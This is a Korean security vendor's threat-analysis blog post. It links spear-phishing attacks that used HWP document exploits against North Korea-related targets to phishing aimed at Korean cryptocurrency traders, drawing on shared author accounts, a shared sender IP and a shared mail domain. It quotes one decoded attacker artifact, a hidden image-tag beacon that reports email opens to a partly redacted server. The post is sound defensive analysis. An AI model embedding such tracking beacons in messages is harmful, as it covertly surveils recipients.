문서파일 취약점 공격과 한국 가상화폐 거래자 대상 공격간의 연관성 분석

안녕하세요? 이스트시큐리티 시큐리티대응센터(ESRC)입니다.

여러분들도 잘 아시다시피 한국에서는 다양한 보안위협과 침해사고가 이어지고 있습니다.

이러한 사이버 위협에는 항상 배후가 존재하지만, 사이버 세상의 특성상 공격자와 거점을 특정하고 실체를 규명하는 것은 매우 어려운 일입니다.

하지만 어떠한 현상이나 사건에는 누구도 의식하지 못한 사이 특정 코드가 기록되거나, 평상시 습관에 의해 고유한 흔적을 남겨 결정적 증거나 단서로 사용됩니다.

사이버 공격자가 제작한 코드를 분석하거나 공격에 활용된 시스템, 네트워크, 사용 언어 등 다양한 환경과 프로세스를 분석해 공통점을 찾아가는 과정은 많은 시간과 노력이 필요하지요.

■ 공격자의 관심사와 공격의도를 고민하자!

각 분야별 침해 위협을 분석하고 대응하는 입장에서 공격자의 의도를 우선 고민하고 이해하기 위한 노력은 꽤 중요합니다.

그래야만 공격자의 특성을 보다 정확히 파악하고, 침해사고 간 유의미한 연관자료를 찾아 신속하고 정확한 대응안 마련에 조금이나마 도움을 줄 것 입니다.

더불어 특정 분야별로 오랜기간 공격을 지속 한다거나, 타깃 변화를 시계열 흐름에 따라 구분해 연관성 데이터를 추적하는 것도 좋은 요소가 됩니다.

■ 한국 맞춤형 문서파일 취약점을 활용한 스피어 피싱(Spear Phishing) 공격

2017년 중순 경 대북관련 분야에서 활동하는 한국의 특정인을 상대로 문서파일 취약점 공격이 수행됩니다.

이 공격에 사용된 취약점은 한국에서만 주로 발견되고 있는 HWP 문서파일의 취약점이 사용되었고, 문서 파일의 지은이는 'SEIKO', 마지막 저장한 사람 계정은 'Lion' 입니다.

[그림 1] 문서파일 취약점 작성에 사용된 공격자 계정

그런데 흥미롭게도 이 계정은 지난 2015년 초 한국의 특정 전력 분야 대상으로 한 스피어 피싱 공격에서 식별된 바 있으며, 2016년 중순에는 한국의 특정 연구기관을 상대로 한 공격에도 발견되었습니다. 

거기에 2017년에는 '문재인 정부의 탈핵선언 비판' 내용의 악성 문서파일과 '경찰청 사칭' 등 한국 맞춤형 사이버 위협에서 최소 10건 이상 발견됩니다.

[그림 2] 한국 전력분야 대상 공격에 사용된 계정명

해당 계정의 공격자가 2017년 주요 공격 대상으로 삼았던 곳은 한국내 통일, 안보, 탈북 등 대북관련 분야에서 활동하고 있다는 공통점이 존재합니다.

■ 공격 현장에 남겨진 디지털 증거의 방향을 살펴보자

상기와 같은 계정 측면의 흔적 외에도 공격자를 특정할 수 있는 다양한 침해지표를 지정할 수 있습니다. 실제 공격에 사용된 원점을 파악해 유사 공통점을 찾는 것 입니다.

2017년 중순 경 공격자는 대북관련 분야의 한국인을 상대로 스피어 피싱 공격을 수행했고, 이 공격에는 감염 대상자가 해당 위협에 어느정도 노출되고 있는지 체크하는 기능이 은밀히 숨겨져 있었습니다.

공격에 사용된 아이피 주소는 '110.45.140.(생략)' 이며, 헤더 내부에는 Content-Transfer-Encoding: base64 코드로 인코딩된 데이터가 포함되어 있습니다.

이 데이터를 디코딩하면 한국의 특정 웹 사이트로 이미지 소스 태그가 연결되고, PHP 명령에 의해 이메일 열람한 상황이 전송됩니다. 또한 발신자의 아이피 주소와 이미지 소스 태그의 호스트는 동일한 서버입니다.

<img src="http://sam(생략)eng.co.kr/datum/img.php?id=(id)&emt=(host)&hx=99" border="0" width="0" />

이런 가운데 2017년 12월 초 동일한 아이피 주소에서 한국 포털 사이트의 계정 보호 기능 안내로 위장한 피싱 공격이 식별됩니다.

[그림 3] 포털 사이트 계정 도용방지를 위한 비밀번호 입력 위장 피싱 화면

그런데 이 공격은 주로 한국의 특정 가상화폐 거래관계 회원들에게 발송된 특징이 있고, 우연하게도 수년 전부터 안보, 통일, 국방, 대북관련 분야 관계자를 겨냥해 공격한 스피어 피싱 공격지 원점과 일치합니다.

두 공격의 발신지 IP주소가 완벽하게 일치하며, 발송 서버가 메일에 부여하는 고유 식별자 메시지 ID 값의 도메인 주소도 'sam(생략)eng.co.kr' 값으로 동일하게 사용 되었습니다.

또한, 한국내 가상화폐 관계자들에게도 문서파일 취약점을 활용한 공격은 지난 수개월 간 지속적으로 이어지고 있습니다.

[그림 4] 한국 가상화폐 거래소 관계자나 회원을 대상으로 유포된 악성 문서 파일 화면

지난 수년 간 한국의 기반시설과 안보, 통일, 국방, 금융, 대북관련 단체 등을 대상으로 은밀한 침투를 꾸준히 시도하던 공격자가 한국의 가상화폐 거래 회원들을 상대로도 피싱 공격 수행할 가능성이 높은 대목입니다.

▶ [주의] 가상화폐 거래 관계자를 대상으로 한 스피어피싱 지속

▶ 비트코인 관련 내용으로 진행 중인 스피어피싱 공격 주의

이처럼 한국을 대상으로 한 공격이 다양한 형태로 변모하고 있다는 점을 명심하고, 수신된 이메일의 경우 항상 주의하는 보안습관이 필요하겠습니다.